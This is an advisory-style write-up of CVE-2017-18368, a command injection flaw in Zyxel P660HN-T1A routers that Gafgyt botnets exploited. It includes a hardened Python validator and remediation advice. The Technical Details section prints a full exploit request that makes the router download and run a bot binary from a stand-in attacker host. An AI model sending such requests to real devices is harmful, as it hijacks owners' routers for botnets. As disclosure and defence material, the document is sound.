What Is Zyxel P660HN-T1A?
The Zyxel P660HN-T1A is an ADSL2+ DSL modem/router widely deployed as home and small business internet gateway hardware. Like most consumer and small business networking equipment, it includes a web-based management interface for configuration. Consumer routers are prime targets for IoT botnet recruitment because they are internet-connected, rarely patched, run 24/7, and often have weak or default credentials. Compromised routers are typically recruited into DDoS botnets (Mirai, Gafgyt, and variants) or used as proxy infrastructure for threat actor operations.
Overview
CVE-2017-18368 is a critical unauthenticated OS command injection vulnerability in Zyxel P660HN-T1A routers. The Remote System Log forwarding feature passes the remote_host parameter from the ViewLog.asp page directly to a system command without sanitization, allowing an unauthenticated attacker to inject arbitrary OS commands executed as root on the router. This vulnerability was actively exploited in 2023 by a new variant of the Gafgyt (BASHLITE) IoT botnet, triggering its KEV addition. Zyxel issued a security advisory recommending firmware updates where available and device replacement for end-of-life models.
Affected Versions
Zyxel P660HN-T1A v1 and v2 hardware revisions running firmware before the patched release. Given the age and end-of-life status of this hardware, many deployed units may never receive firmware updates.
Technical Details
Root Cause: Unsanitized Parameter in System Log Forwarding
CVE-2017-18368 is an OS command injection vulnerability (CWE-78) in the P660HN-T1A's web management interface. The router supports a "Remote System Log" feature that forwards syslog messages to a specified remote host. The ViewLog.asp page accepts a remote_host parameter for configuring the syslog destination. This parameter is passed without sanitization to an underlying shell command that configures the syslog forwarding — enabling an attacker to inject shell metacharacters (;, &&, |, backticks) to execute arbitrary commands.
The endpoint is accessible without authentication, making the attack completely trivial:
GET /ViewLog.asp?remote_host=127.0.0.1;wget+http://attacker/bot+-O+/tmp/bot;chmod+777+/tmp/bot;/tmp/bot
Commands execute as root (the management interface process user), giving the attacker full device control.
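The defect described above is a string-concatenation pattern, so the fix is the same on any platform: allow-list the parameter to the shape a syslog destination can legitimately have, and never hand it to a shell. The following is an added illustration and not code from the router firmware or from Zyxel; the `syslogd -R` invocation is a hypothetical stand-in for whatever the device actually runs, and the vulnerable variant only returns the command string rather than executing it.

```python
import ipaddress
import re

# Hostname labels per RFC 1123: letters, digits and hyphens, no leading or
# trailing hyphen, joined by dots. Everything else (including ; & | and
# backticks) fails the match.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")


def validate_remote_host(value: str) -> str:
    """Return value unchanged if it is a syntactically valid IP address or
    hostname; raise ValueError otherwise. Allow-listing the expected shape is
    what makes shell metacharacters impossible to smuggle through."""
    if not value or len(value) > 253:
        raise ValueError("remote_host missing or too long")
    try:
        ipaddress.ip_address(value)  # accepts IPv4 and IPv6 literals
        return value
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(value):
        return value
    raise ValueError(f"remote_host is not a hostname or IP address: {value!r}")


def vulnerable_command(remote_host: str) -> str:
    """The anti-pattern: untrusted input interpolated into a shell command
    line. Returned as a string (not executed) so the example is safe to run.
    A shell given this string treats ';' as a command separator."""
    return f"syslogd -R {remote_host}"  # hypothetical daemon invocation


def hardened_command(remote_host: str) -> list[str]:
    """Validated input passed as a discrete argv element. Handing this list to
    subprocess.run(...) with shell=False means no shell ever parses it, so a
    metacharacter would only ever be an (invalid) hostname, not a command."""
    host = validate_remote_host(remote_host)
    return ["syslogd", "-R", host]


if __name__ == "__main__":
    # Constructed inputs: two legitimate destinations and the injection shape
    # from the advisory (a second command appended after ';').
    for candidate in ("192.0.2.10", "logs.example.net", "127.0.0.1;id"):
        print("shell string would be:", repr(vulnerable_command(candidate)))
        try:
            print("hardened argv:", hardened_command(candidate))
        except ValueError as exc:
            print("rejected:", exc)
```

The validator is deliberately strict rather than a deny-list of known metacharacters: a deny-list has to anticipate every shell feature, while an allow-list only has to describe a hostname.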
Attack Characteristics
| Attribute | Detail |
|---|---|
| Attack Vector | Network — unauthenticated HTTP GET |
| Endpoint | /ViewLog.asp?remote_host= |
| Authentication | None required |
| Impact | Root command execution on router |
| Common Payload | Download and execute botnet malware |
Discovery
Discovered by security researchers and published as a CVE in 2019. The vulnerability was being exploited in the wild by 2023, when Gafgyt botnet operators incorporated it into their scanning and exploitation infrastructure.
Exploitation Context
- Gafgyt (BASHLITE) botnet: A new Gafgyt variant in 2023 incorporated CVE-2017-18368 alongside other IoT device exploits to recruit routers into DDoS infrastructure; Zyxel published its security advisory in direct response to observed exploitation
- IoT botnet mechanics: Botnets like Gafgyt scan the internet for vulnerable devices, automatically exploit them, download a bot binary from C2 infrastructure, and configure persistence; the entire compromise takes seconds and requires no human interaction
- End-of-life device prevalence: The P660HN-T1A is an older device that may not receive firmware updates; internet-facing DSL routers with no available patch represent permanent exposure
- DDoS-for-hire infrastructure: Compromised home and small business routers are aggregated into botnets rented for DDoS attacks; the attacker's goal is not the router data but its bandwidth and IP address
- CISA KEV (2023): Added August 7, 2023 reflecting active Gafgyt exploitation
Remediation
- Apply Zyxel firmware update — check Zyxel's support site for P660HN-T1A firmware updates; apply any available updates that address CVE-2017-18368.
- Replace end-of-life hardware — if no firmware update is available for your hardware revision, replace the P660HN-T1A with a currently supported router model that receives security updates.
- Disable remote management access — ensure the router management interface is not accessible from the internet (WAN-side access disabled); restricting management to the LAN side eliminates the remote exploitation vector.
- Change default credentials — ensure the router admin password is changed from factory defaults; even if this vulnerability is patched, default credentials remain a common attack vector for router compromise.
- Network monitoring — monitor for unusual outbound traffic patterns (high UDP traffic, connections to known botnet C2 infrastructure) which may indicate compromise; compromised routers typically show distinctive botnet traffic signatures.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2017-18368 |
| Vendor / Product | Zyxel — P660HN-T1A Routers |
| NVD Published | 2019-05-02 |
| NVD Last Modified | 2025-11-05 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') |
| CISA KEV Added | 2023-08-07 |
| CISA KEV Deadline | 2023-08-28 |
| Known Ransomware Use | No |
Timeline
| Date | Event |
|---|---|
| 2019-05-02 | CVE-2017-18368 published by NVD |
| 2023-08-07 | Zyxel publishes security advisory; CVE-2017-18368 added to CISA Known Exploited Vulnerabilities catalog following Gafgyt botnet exploitation |
| 2023-08-28 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2017-18368 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| Zyxel Security Advisory — Command Injection in P660HN-T1A | Vendor Advisory |